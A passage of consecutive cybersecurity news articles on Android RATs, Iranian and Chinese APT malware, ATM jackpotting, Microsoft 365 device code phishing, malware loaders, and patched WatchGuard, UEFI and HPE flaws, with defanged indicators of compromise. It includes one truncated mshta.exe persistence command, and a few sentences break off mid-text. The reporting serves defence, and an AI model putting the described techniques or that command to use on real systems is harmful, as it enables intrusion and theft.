This hierarchical structure reflects a new maturation of the financial fraud operation. “The new wave of malware development in the region clearly demonstrates that methods of compromising Android devices are not just becoming more sophisticated – they are evolving at a rapid pace,” Group-IB said. Attackers are actively adapting their tools, implementing new approaches to distribution, concealment of activity, and maintaining control over infected devices.” The disclosure coincides with the emergence of new Android malware, such as Cellik , Frogblight , and NexusRoute , that are capable of harvesting sensitive information from compromised devices. Cellik, which is advertised on the dark web for a starting price of $150 for one month or for $900 for a lifetime licence, is equipped with real-time screen streaming, keylogging, remote camera/microphone access, data wiping, hidden web browsing, notification interception, and app overlays to steal credentials.
Perhaps the Trojan’s most troubling feature is a one-click APK builder that allows customers to bundle the malicious payload within legitimate Google Play apps for distribution. “Through its control interface, an attacker can browse the entire Google Play Store catalogue and select legitimate apps to bundle with the Cellik payload,” iVerify’s Daniel Kelley said. “With one click, Cellik will generate a new malicious APK that wraps the RAT inside the chosen legitimate app.” Frogblight, on the other hand, has been found to target users in Turkey via SMS phishing messages that trick recipients into installing the malware under the pretext of viewing court documents related to a court case they are purported to be involved in, Kaspersky said. Besides stealing banking credentials using WebViews, the malware can collect SMS messages, call logs, a list of installed apps on the device, and device file system information.
It can also manage contacts and send arbitrary SMS messages. Frogblight is believed to be under active development, with the threat actor behind the tool laying the groundwork for it to be distributed under a malware-as-a-service (MaaS) model. This assessment is based on the discovery of a web panel hosted on the C2 server and the fact that only samples using the same key as the web panel login can be remotely controlled through it. Malware families like Cellik and Frogblight are part of a growing trend of Android malware, wherein even attackers with little to no technical expertise can now run mobile campaigns at scale with minimal effort.
In recent weeks, Android users in India have also been targeted by a malware dubbed NexusRoute that employs phishing portals impersonating the Indian government services to redirect visitors to malicious APKs hosted on GitHub repositories and GitHub Pages, while simultaneously collecting their personal and financial information. The bogus sites are designed to infect Android devices with a fully obfuscated remote access trojan (RAT) that can steal mobile numbers, vehicle data, UPI PINs, OTPs, and card details, as well as harvest extensive data by abusing accessibility services and prompting users to set it as the default home screen launcher. “Threat actors increasingly weaponize government branding, payment workflows, and citizen service portals to deploy financially driven malware and phishing attacks under the guise of legitimacy,” CYFIRMA said. “The malware performs SMS interception, SIM profiling, contact theft, call-log harvesting, file access, screenshot capture, microphone activation, and GPS tracking.” Further analysis of an embedded email address “gymkhana.studio@gmail[.]com” has linked NexusRoute to a broader underground development ecosystem, raising the possibility that it’s part of a professionally maintained, large-scale fraud and surveillance infrastructure.
“The NexusRoute campaign represents a highly mature, professionally engineered mobile cybercrime operation that combines phishing, malware, financial fraud, and surveillance into a unified attack framework,” the company said. “The use of native-level obfuscation, dynamic loaders, automated infrastructure, and centralized surveillance control places this campaign well beyond the capabilities of common scam actors.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Iranian Infy APT Resurfaces with New Malware Activity After Years of Silence
Threat hunters have discerned new activity associated with an Iranian threat actor known as Infy (aka Prince of Persia), nearly five years after the hacking group was observed targeting victims in Sweden, the Netherlands, and Turkey. “The scale of Prince of Persia’s activity is more significant than we originally anticipated,” Tomer Bar, vice president of security research at SafeBreach, said in a technical breakdown shared with The Hacker News. “This threat group is still active, relevant, and dangerous.” Infy is one of the oldest advanced persistent threat (APT) actors in existence, with evidence of early activity dating all the way back to December 2004, according to a report released by Palo Alto Networks Unit 42 in May 2016 that was also authored by Bar, along with researcher Simon Conant. The group has also managed to remain elusive, attracting little attention, unlike other Iranian hacking crews such as Charming Kitten , MuddyWater , and OilRig .
Attacks mounted by the group have prominently leveraged two strains of malware: a downloader and victim profiler named Foudre that delivers a second-stage implant called Tonnerre to extract data from high-value machines. It’s assessed that Foudre is distributed via phishing emails. The latest findings from SafeBreach have uncovered a covert campaign that has targeted victims across Iran, Iraq, Turkey, India, and Canada, as well as Europe, using updated versions of Foudre (version 34) and Tonnerre (versions 12-18, 50). The latest version of Tonnerre was detected in September 2025.
The attack chains have also witnessed a shift from a macro-laced Microsoft Excel file to embedding an executable within such documents to install Foudre. Perhaps the most notable aspect of the threat actor’s modus operandi is the use of a domain generation algorithm (DGA) to make its command-and-control (C2) infrastructure more resilient. In addition, Foudre and Tonnerre artifacts are known to validate if the C2 domain is authentic by downloading an RSA signature file, which the malware then decrypts using a public key and compares with a locally-stored validation file. SafeBreach’s analysis of the C2 infrastructure has also uncovered a directory named “key” that’s used for C2 validation, along with other folders to store communication logs and the exfiltrated files.
“Every day, Foudre downloads a dedicated signature file encrypted with an RSA private key by the threat actor and then uses RSA verification with an embedded public key to verify that this domain is an approved domain,” Bar said. “The request’s format is: ‘https://
The group has two members: a Telegram bot “ @ttestro1bot “ that’s likely used to issue commands and collect data, and a user with the handle “ @ehsan8999100 .” While the use of the messaging app for C2 is not uncommon, what’s notable is that the information about the Telegram group is stored in a file named “tga.adr” within a directory called “t” in the C2 server. It’s worth noting that the download of the “tga.adr” file can only be triggered for a specific list of victim GUIDs. Also discovered by the cybersecurity company are other older variants used in Foudre campaigns between 2017 and 2020 - A version of Foudre camouflaged as Amaq News Finder to download and execute the malware A new version of a trojan called MaxPinner that’s downloaded by Foudre version 24 DLL to spy on Telegram content A variation of malware called Deep Freeze, similar to Amaq News Finder, is used to infect victims with Foudre An unknown malware called Rugissement “Despite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite,” SafeBreach said. “Our ongoing research campaign into this prolific and elusive group has highlighted critical details about their activities, C2 servers, and identified malware variants in the last three years.” The disclosure comes as DomainTools’ continued analysis of Charming Kitten leaks has painted the picture of a hacking group that functions more like a government department, while running “espionage operations with clerical precision.” The threat actor has also been unmasked as behind the Moses Staff persona.
“APT 35, the same administrative machine that runs Tehran’s long-term credential-phishing operations, also ran the logistics that powered Moses Staff’s ransomware theatre,” the company said . “The supposed hacktivists and the government cyber-unit share not only tooling and targets but also the same accounts-payable system. The propaganda arm and the espionage arm are two products of a single workflow: different “projects” under the same internal ticketing regime.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Pentesting With Proof. Zero-Day, Zero-Pay and the #1 AI Hacker Behind It
U.S. DOJ Charges 54 in ATM Jackpotting Scheme Using Ploutus Malware
The U.S. Department of Justice (DoJ) this week announced the indictment of 54 individuals in connection with a multi-million dollar ATM jackpotting scheme. The large-scale conspiracy involved deploying malware named Ploutus to hack into automated teller machines (ATMs) across the U.S. and force them to dispense cash.
The indicted members are alleged to be part of Tren de Aragua (TdA, Spanish for “the train of Aragua”), a Venezuelan gang designated a foreign terrorist organization by the U.S. State Department. In July 2025, the U.S. government announced sanctions against the group’s head, Hector Rusthenford Guerrero Flores (aka Niño Guerrero), and five other key members for their involvement in the “illicit drug trade, human smuggling and trafficking, extortion, sexual exploitation of women and children, and money laundering, among other criminal activities.” The Justice Department said an indictment returned on December 9, 2025, has charged a group of 22 people for supposedly committing bank fraud, burglary, and money laundering.
Prosecutors also alleged that TdA has leveraged jackpotting schemes to siphon millions of dollars in the U.S. and transfer the ill-gotten proceeds among its members and associates. Another 32 individuals have been charged in a second, related indictment returned on October 21, 2025, accusing them of “one count of conspiracy to commit bank fraud, one count of conspiracy to commit bank burglary and computer fraud, 18 counts of bank fraud, 18 counts of bank burglary, and 18 counts of damage to computers.” If convicted, the defendants could face a maximum penalty of anywhere between 20 and 335 years in prison. “These defendants employed methodical surveillance and burglary techniques to install malware into ATM machines, and then steal and launder money from the machines, in part to fund terrorism and the other far-reaching criminal activities of TDA, a designated Foreign Terrorist Organization,” said Acting Assistant Attorney General Matthew R.
Galeotti of the Justice Department’s Criminal Division. The jackpotting operation is said to have relied on the TdA recruiting an unspecified number of individuals to deploy the malware across the nation. These individuals would then conduct initial reconnaissance to assess external security measures installed at various ATMs and then attempt to open the ATM’s hood to check if they triggered any alarm or a law enforcement response. Following this step, the threat actors would install Ploutus by either replacing the hard drive with one that came preloaded with the malicious program or by connecting a removable thumb drive.
The malware is equipped to issue unauthorized commands associated with the Cash Dispensing Module of the ATM in order to force currency withdrawals. “The Ploutus malware was also designed to delete evidence of malware in an effort to conceal, create a false impression, mislead, or otherwise deceive employees of the banks and credit unions from learning about the deployment of the malware on the ATM,” the DoJ said. “Members of the conspiracy would then split the proceeds in predetermined portions.” Ploutus was first detected in Mexico in 2013. In a 2014 report, Symantec detailed how Windows XP-based ATMs compromised by the malware could be exploited to allow cybercriminals to withdraw cash simply by sending an SMS command.
A subsequent analysis from FireEye (now part of Google Mandiant) in 2017 detailed its ability to control Diebold ATMs and run on various Windows versions. “Once deployed to an ATM, Ploutus-D makes it possible for a money mule to obtain thousands of dollars in minutes,” it explained at the time. “A money mule must have a master key to open the top portion of the ATM (or be able to pick it), a physical keyboard to connect to the machine, and an activation code (provided by the boss in charge of the operation) in order to dispense money from the ATM.” According to the agency, a total of 1,529 jackpotting incidents have been recorded in the U.S. since 2021, with about $40.73 million lost to the international criminal network as of August 2025.
“Many millions of dollars were drained from ATM machines across the United States as a result of this conspiracy, and that money is alleged to have gone to Tren de Aragua leaders to fund their terrorist activities and purposes,” U.S. Attorney Lesley Woods said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Russia-Linked Hackers Use Microsoft 365 Device Code Phishing for Account Takeovers
A suspected Russia-aligned group has been attributed to a phishing campaign that employs device code authentication workflows to steal victims’ Microsoft 365 credentials and conduct account takeover attacks. The activity, ongoing since September 2025, is being tracked by Proofpoint under the moniker UNK_AcademicFlare . The attacks involve using compromised email addresses belonging to government and military organizations to strike entities within government, think tanks, higher education, and transportation sectors in the U.S. and Europe.
“Typically, these compromised email addresses are used to conduct benign outreach and rapport building related to the targets’ area of expertise to ultimately arrange a fictitious meeting or interview,” the enterprise security company said . As part of these efforts, the adversary claims to share a link to a document that includes questions or topics for the email recipient to review before the meeting. The URL points to a Cloudflare Worker URL that mimics the compromised sender’s Microsoft OneDrive account and instructs the victim to copy the provided code and click “Next” to access the supposed document. However, doing so redirects the user to the legitimate Microsoft device code login URL, where, once the previously provided code is entered, it causes the service to generate an access token that can then be recovered by the three actors to take control of the victim account.
Device code phishing was documented in detail by both Microsoft and Volexity in February 2025, attributing the use of the attack method to Russia-aligned clusters such as Storm-2372, APT29, UTA0304, and UTA0307. Over the past couple of months, Amazon Threat Intelligence and Volexity have warned of continued attacks mounted by Russian threat actors that abuse the device code authentication flow. Proofpoint said UNK_AcademicFlare is likely a Russia-aligned threat actor given its targeting of Russia-focused specialists at multiple think tanks and Ukrainian government and energy sector organizations. Data from the company shows that multiple threat actors, both state-aligned and financially-motivated, have latched onto the phishing tactic to deceive users into giving them access to Microsoft 365 accounts.
This includes an e-crime group named TA2723 that has used salary-related lures in phishing emails to direct users to fake landing pages and trigger device code authorization. The October 2025 campaign is assessed to have been fueled by the ready availability of crimeware offerings like the Graphish phishing kit and red-team tools such as SquarePhish . “Similar to SquarePhish, the tool is designed to be user-friendly and does not require advanced technical expertise, lowering the barrier for entry and enabling even low-skilled threat actors to conduct sophisticated phishing campaigns,” Proofpoint said. “The ultimate objective is unauthorized access to sensitive personal or organizational data, which can be exploited for credential theft, account takeover, and further compromise.” To counter the risk posed by device code phishing, the best option is to create a Conditional Access policy using the Authentication Flows condition to block device code flow for all users.
If that’s not feasible, it’s advised to use a policy that uses an allow-list approach to allow device code authentication for approved users, operating systems, or IP ranges. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Cracked Software and YouTube Videos Spread CountLoader and GachiLoader Malware
Cybersecurity researchers have disclosed details of a new campaign that has used cracked software distribution sites as a distribution vector for a new version of a modular and stealthy loader known as CountLoader. The campaign “uses CountLoader as the initial tool in a multistage attack for access, evasion, and delivery of additional malware families,” Cyderes Howler Cell Threat Intelligence team said in an analysis. CountLoader was previously documented by both Fortinet and Silent Push, detailing the loader’s ability to push payloads like Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and PureMiner. The loader has been detected in the wild since at least June 2025.
The latest attack chain begins when unsuspecting users attempt to download cracked versions of legitimate software like Microsoft Word, which causes them to be redirected to a MediaFire link hosting a malicious ZIP archive, which contains an encrypted ZIP file and a Microsoft Word document with the password to open the second archive. Present within the ZIP file is a renamed legitimate Python interpreter (“Setup.exe”) that has been configured to execute a malicious command to retrieve CountLoader 3.2 from a remote server using “mshta.exe.” To establish persistence, the malware creates a scheduled task that mimics Google by using the name “GoogleTaskSystem136.0.7023.12” along with an identifier-like string. It’s configured to run every 30 minutes for 10 years by invoking “mshta.exe” with a fallback domain. It also checks if CrowdStrike’s Falcon security tool is installed on the host by querying the antivirus list via Windows Management Instrumentation (WMI).
If the service is detected, the persistence command is tweaked to “cmd.exe /c start /b mshta.exe
“Its ability to deliver ACR Stealer through a multi-stage process starting from Python library tampering to in-memory shellcode unpacking highlights a growing trend of signed binary abuse and fileless execution tactics.” YouTube Ghost Network Delivers GachiLoader The disclosure comes as Check Point disclosed details of a new, heavily obfuscated JavaScript malware loader dubbed GachiLoader that’s written in Node.js. The malware is distributed by means of the YouTube Ghost Network , a network of compromised YouTube accounts that engage in malware distribution. “One variant of GachiLoader deploys a second-stage malware, Kidkadi, that implements a novel technique for Portable Executable (PE) injection,” security researchers Sven Rath and Jaromír Hořejší said . “This technique loads a legitimate DLL and abuses Vectored Exception Handling to replace it on-the-fly with a malicious payload.” As many as 100 YouTube videos have been flagged as part of the campaign, amassing approximately 220,000 views.
These videos were uploaded from 39 compromised accounts, with the first video dating back to December 22, 2024. A majority of these videos have since been taken down by Google. In at least one case, GachiLoader has served as a conduit for the Rhadamanthys information stealer malware. Like other loaders, GachiLoader is used to deploy additional payloads to an infected machine, while simultaneously performing a series of anti-analysis checks to fly under the radar.
It also verifies if it’s running in an elevated context by executing the “net session” command. In the event the execution fails, it attempts to start itself with admin privileges, which, in turn, triggers a User Account Control ( UAC ) prompt. There are high chances that the victim will allow it to continue, as the malware is likely to be distributed through fake installers for popular software, as outlined in the case of CountLoader. In the last phase, the malware attempts to kill “SecHealthUI.exe,” a process associated with Microsoft Defender , and configures Defender exclusions to avoid the security solution from flagging malicious payloads staged in certain folders (e.g., C:\Users\, C:\ProgramData\, and C:\Windows).
GachiLoader then proceeds to either directly fetch the final payload from a remote URL or employ another loader named “kidkadi.node,” which then loads the main malware by abusing Vectored Exception Handling . “The threat actor behind GachiLoader demonstrated proficiency with Windows internals, coming up with a new variation of a known technique,” Check Point said. “This highlights the need for security researchers to stay up-to-date with malware techniques such as PE injections and to proactively look for new ways in which malware authors try to evade detection.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
WatchGuard Warns of Active Exploitation of Critical Fireware OS VPN Vulnerability
WatchGuard has released fixes to address a critical security flaw in Fireware OS that it said has been exploited in real-world attacks. Tracked as CVE-2025-14733 (CVSS score: 9.3), the vulnerability has been described as a case of out-of-bounds write affecting the iked process that could allow a remote unauthenticated attacker to execute arbitrary code. “This vulnerability affects both the mobile user VPN with IKEv2 and the branch office VPN using IKEv2 when configured with a dynamic gateway peer,” the company said in a Thursday advisory. “If the Firebox was previously configured with the mobile user VPN with IKEv2 or a branch office VPN using IKEv2 to a dynamic gateway peer, and both of those configurations have since been deleted, that Firebox may still be vulnerable if a branch office VPN to a static gateway peer is still configured.” The vulnerability impacts the following versions of Fireware OS - 2025.1 - Fixed in 2025.1.4 12.x - Fixed in 12.11.6 12.5.x (T15 & T35 models) - Fixed in 12.5.15 12.3.1 (FIPS-certified release) - Fixed in 12.3.1_Update4 (B728352) 11.x (11.10.2 up to and including 11.12.4_Update1) - End-of-Life WatchGuard acknowledged that it has observed threat actors actively attempting to exploit this vulnerability in the wild, with the attacks originating from the following IP addresses - 45.95.19[.]50 51.15.17[.]89 172.93.107[.]67 199.247.7[.]82 Interestingly, the IP address “199.247.7[.]82” was also flagged by Arctic Wolf earlier this week as linked to the exploitation of two recently disclosed security vulnerabilities in Fortinet FortiOS, FortiWeb, FortiProxy, and FortiSwitchManager (CVE-2025-59718 and CVE-2025-59719, CVSS scores: 9.8).
The Seattle-based company has also shared multiple indicators of compromise (IoCs) that device owners can use to determine if their own instances have been infected - A log message stating “Received peer certificate chain is longer than 8. Reject this certificate chain” when the Firebox receives an IKE2 Auth payload with more than 8 certificates An IKE_AUTH request log message with an abnormally large CERT payload size (greater than 2000 bytes) During a successful exploit, the iked process will hang, interrupting VPN connections After a failed or successful exploit, the IKED process will crash and generate a fault report on the Firebox The disclosure comes a little over a month after the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added another critical WatchGuard Fireware OS flaw (CVE-2025-9242, CVSS score: 9.3) to its Known Exploited Vulnerabilities (KEV) catalog after reports of active exploitation. It’s currently not known if these two sets of attacks are related.
Users are advised to apply the updates as soon as possible to secure against the threat. As temporary mitigation for devices with vulnerable Branch Office VPN (BOVPN) configurations, the company has urged administrators to disable dynamic peer BOVPNs, create an alias that includes the static IP addresses of remote BOVPN peers, add new firewall policies that allow access from the alias, and disable the default built-in policies that handle VPN traffic. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Nigeria Arrests RaccoonO365 Phishing Developer Linked to Microsoft 365 Attacks
Authorities in Nigeria have announced the arrest of three “high-profile internet fraud suspects” who are alleged to have been involved in phishing attacks targeting major corporations, including the main developer behind the RaccoonO365 phishing-as-a-service (PhaaS) scheme. The Nigeria Police Force National Cybercrime Centre (NPF–NCCC) said investigations conducted in collaboration with Microsoft and the Federal Bureau of Investigation (FBI) led to the identification of Okitipi Samuel, also known as Moses Felix, as the principal suspect and developer of the phishing infrastructure. “Investigations reveal that he operated a Telegram channel through which phishing links were sold in exchange for cryptocurrency and hosted fraudulent login portals on Cloudflare using stolen or fraudulently obtained email credentials,” the NPF said in a post shared on social media. In addition, laptops, mobile devices, and other digital equipment linked to the operation have been seized following search operations conducted at their residences.
The two other arrested individuals have no connection to the creation or operation of the PhaaS service, per the NPF. The arrests were carried out following raids in Lagos and Edo states. RaccoonO365 is the name assigned to a financially motivated threat group behind a PhaaS toolkit that enables bad actors to conduct credential harvesting attacks by serving phishing pages mimicking Microsoft 365 login pages. Microsoft is tracking the threat actor under the moniker Storm-2246.
Back in September 2025, the tech giant said it worked with Cloudflare to seize 338 domains used by RaccoonO365. The phishing infrastructure attributed to the toolkit is estimated to have led to the theft of at least 5,000 Microsoft credentials from 94 countries since July 2024. The NPF said RaccoonO365 was used to set up fraudulent Microsoft login portals aimed at stealing user credentials and using them to gain unlawful access to the email platforms of corporate, financial, and educational institutions. The joint probe has uncovered multiple incidents of unauthorized Microsoft 365 account access between January and September 2025 that originated from phishing messages crafted to mimic legitimate Microsoft authentication pages.
These activities led to business email compromise, data breaches, and financial losses across multiple jurisdictions, the NPF added. A civil lawsuit filed by Microsoft and Health-ISAC in September has accused defendants Joshua Ogundipe and four other John Does of hosting a cybercriminal operation by “selling, distributing, purchasing, and implementing” the phishing kit to facilitate sophisticated spear-phishing and siphon sensitive information. The stolen data is then used to fuel more cybercrimes, including business email compromise, financial fraud, and ransomware attacks, as well as commit intellectual property violations, the lawsuit alleged. The lawsuit also identified Ogundipe as the mastermind behind the operation.
His present whereabouts are unclear. When reached for comment, a Microsoft spokesperson told The Hacker News that investigations are ongoing. The development comes as Google filed a lawsuit against the operators of the Darcula PhaaS service, naming Chinese national Yucheng Chang as the group’s leader along with 24 other members. The company is seeking a court order to seize the group’s server infrastructure that has been behind a massive smishing wave impersonating U.S.
government entities. Darcula and associates are estimated to have stolen nearly 900,000 credit card numbers, including nearly 40,000 from Americans, according to an investigation from the Norwegian Broadcasting Corporation (NRK) and cybersecurity company Mnemonic. The Chinese-language phishing kit first emerged in July 2023. News of the lawsuit was first reported by NBC News on December 17, 2025.
The development comes a little over a month after Google also sued China-based hackers associated with another PhaaS service known as Lighthouse that’s believed to have impacted over 1 million users across 120 countries. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
New UEFI Flaw Enables Early-Boot DMA Attacks on ASRock, ASUS, GIGABYTE, MSI Motherboards
Certain motherboard models from vendors like ASRock, ASUSTeK Computer, GIGABYTE, and MSI are affected by a security vulnerability that leaves them susceptible to early-boot direct memory access ( DMA ) attacks across architectures that implement a Unified Extensible Firmware Interface ( UEFI ) and input–output memory management unit ( IOMMU ). UEFI and IOMMU are designed to enforce a security foundation and prevent peripherals from performing unauthorized memory accesses, effectively ensuring that DMA-capable devices can manipulate or inspect system memory before the operating system is loaded. The vulnerability, discovered by Nick Peterson and Mohamed Al-Sharifi of Riot Games in certain UEFI implementations, has to do with a discrepancy in the DMA protection status. While the firmware indicates that DMA protection is active, it fails to configure and enable the IOMMU during the critical boot phase.
“This gap allows a malicious DMA-capable Peripheral Component Interconnect Express (PCIe) device with physical access to read or modify system memory before operating system-level safeguards are established,” the CERT Coordination Center (CERT/CC) said in an advisory. “As a result, attackers could potentially access sensitive data in memory or influence the initial state of the system, thus undermining the integrity of the boot process.” Successful exploitation of the vulnerability could allow a physically present attacker to enable pre-boot code injection on affected systems running unpatched firmware and access or alter system memory via DMA transactions, much before the operating system kernel and its security features are loaded. The vulnerabilities that enable a bypass of early-boot memory protection are listed below - CVE-2025-14304 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASRock, ASRock Rack, and ASRock Industrial motherboards using Intel 500, 600, 700, and 800 series chipsets CVE-2025-11901 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting ASUS motherboards using Intel Z490, W480, B460, H410, Z590, B560, H510, Z690, B660, W680, Z790, B760, and W790 series chipsets CVE-2025-14302 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting GIGABYTE motherboards using Intel Z890, W880, Q870, B860, H810, Z790, B760, Z690, Q670, B660, H610, W790 series chipsets, and AMD X870E, X870, B850, B840, X670, B650, A620, A620A, and TRX50 series chipsets (Fix for TRX50 planned for Q1 2026) CVE-2025-14303 (CVSS score: 7.0) - A protection mechanism failure vulnerability affecting MSI motherboards using Intel 600 and 700 series chipsets With impacted vendors releasing firmware updates to correct the IOMMU initialization sequence and enforce DMA protections throughout the boot process, it’s essential that end users and administrators apply them as soon as they are available to stay protected against the threat. “In environments where physical access cannot be fully controlled or relied on, prompt patching and adherence to hardware security best practices are especially important,” CERT/CC said.
“Because the IOMMU also plays a foundational role in isolation and trust delegation in virtualized and cloud environments, this flaw highlights the importance of ensuring correct firmware configuration even on systems not typically used in data centers.” Update Riot Games, in a separate post, said the critical flaw could be exploited for injecting code, adding how the privileged state associated with the early boot sequence can be manipulated before the operating system running on the machine can activate its security controls. “This issue allowed hardware cheats to potentially inject code unnoticed, even when security settings on the host appeared to be enabled,” Al-Sharifi said , describing it as a “Sleeping Bouncer” problem. While Pre-Boot DMA Protection is designed as a way to prevent rogue DMA access to a system’s memory using IOMMU early on in the boot sequence, the vulnerability stems from the firmware incorrectly signaling to the operating system that this feature was fully active, when it was failing to initialize the IOMMU correctly during early boot. “This meant that while ‘Pre-Boot DMA Protection’ settings appeared to be enabled in the BIOS, the underlying hardware implementation wasn’t fully initializing the IOMMU during the earliest seconds of the boot process,” Al-Sharifi added.
“In essence, the system’s ‘bouncer’ appeared to be on duty, but was actually asleep in the chair. So by the time the system is fully loaded, it can’t be 100% confident that zero integrity-breaking code was injected via DMA.” This brief exploitation window can pave the way for a “sophisticated hardware cheat” to get in, gain elevated privileges, and conceal itself without raising any red flags. “By closing this pre-boot loophole, we are neutralizing an entire class of previously untouchable cheats and significantly raising the cost of unfair play,” Riot Games noted. Although the vulnerability has been framed from the point of view of the gaming sector, the security risk extends to any attack that can abuse the physical access to inject malicious code.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
China-Aligned Threat Group Uses Windows Group Policy to Deploy Espionage Malware
A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. The end goal of these attacks is cyber espionage, Slovak cybersecurity company ESET said in a report published today. The threat activity cluster has been assessed to be active since at least September 2023. “LongNosedGoblin uses Group Policy to deploy malware across the compromised network, and cloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C&C) servers,” security researchers Anton Cherepanov and Peter Strýček said .
Group Policy is a mechanism for managing settings and permissions on Windows machines. According to Microsoft, Group Policy can be used to define configurations for groups of users and client computers, as well as manage server computers. The attacks are characterized by the use of a varied custom toolset that mainly consists of C#/.NET applications - NosyHistorian, to collect browser history from Google Chrome, Microsoft Edge, and Mozilla Firefox NosyDoor, a backdoor that uses Microsoft OneDrive as C&C and executes commands that allow it to exfiltrate files, delete files, and execute shell commands NosyStealer, to exfiltrate browser data from Google Chrome and Microsoft Edge to Google Drive in the form of an encrypted TAR archive NosyDownloader, to download and run a payload in memory, such as NosyLogger NosyLogger, a modified version of DuckSharp that’s used to log keystrokes NosyDoor execution chain ESET said it first detected activity associated with the hacking group in February 2024 on a system of a governmental entity in Southeast Asia, eventually finding that Group Policy was used to deliver the malware to multiple systems from the same organization. The exact initial access methods used in the attacks are presently unknown.
“In most cases we investigated, the attackers were already inside the network, so we could not determine the initial access method they used,” Cherepanov, a senior malware researcher at ESET, told The Hacker News. Further analysis has determined that while many victims were affected by NosyHistorian between January and March 2024, only a subset of these victims were infected with NosyDoor, indicating a more targeted approach. In some cases, the dropper used to deploy the backdoor using AppDomainManager injection has been found to contain “execution guardrails” that are designed to limit operation to specific victims’ machines. Also employed by LongNosedGoblin are other tools like a reverse SOCKS5 proxy, a utility that’s used to run a video recorder to capture audio and video, and a Cobalt Strike loader.
The cybersecurity company noted that the threat actor’s tradecraft shares tenuous overlaps with clusters tracked as ToddyCat and Erudite Mogwai , but emphasized the lack of definitive evidence linking them together. That said, the similarities between NosyDoor and LuckyStrike Agent and the presence of the phrase “Paid Version” in the PDB path of LuckyStrike Agent have raised the possibility that the malware may be sold or licensed to other threat actors. “We later identified another instance of a NosyDoor variant targeting an organization in an E.U. country, once again employing different TTPs, and using the Yandex Disk cloud service as a C&C server,” the researchers noted.
“The use of this NosyDoor variant suggests that the malware may be shared among multiple China-aligned threat groups.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
HPE OneView Flaw Rated CVSS 10.0 Allows Unauthenticated Remote Code Execution
Hewlett Packard Enterprise (HPE) has resolved a maximum-severity security flaw in OneView Software that, if successfully exploited, could result in remote code execution. The critical vulnerability, assigned the CVE identifier CVE-2025-37164 , carries a CVSS score of 10.0. HPE OneView is an IT infrastructure management software that streamlines IT operations and controls all systems via a centralized dashboard interface. “A potential security vulnerability has been identified in Hewlett Packard Enterprise OneView Software.
This vulnerability could be exploited, allowing a remote unauthenticated user to perform remote code execution,” HPE said in an advisory issued this week. It affects all versions of the software prior to version 11.00 , which addresses the flaw. The company has also made available a hotfix that can be applied to OneView versions 5.20 through 10.20. It’s worth noting that the hotfix must be reapplied after upgrading from version 6.60 or later to version 7.00.00, or after any HPE Synergy Composer reimaging operations.
Separate hotfixes are available for the OneView virtual appliance and Synergy Composer2. Although HPE makes no mention of the flaw being exploited in the wild, it’s essential that users apply the patches as soon as possible for optimal protection. Earlier this June, the company also released updates to fix eight vulnerabilities in its StoreOnce data backup and deduplication solution that could result in an authentication bypass and remote code execution. It also shipped OneView version 10.00 to remediate a number of known flaws in third-party components, such as Apache Tomcat and Apache HTTP Server.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.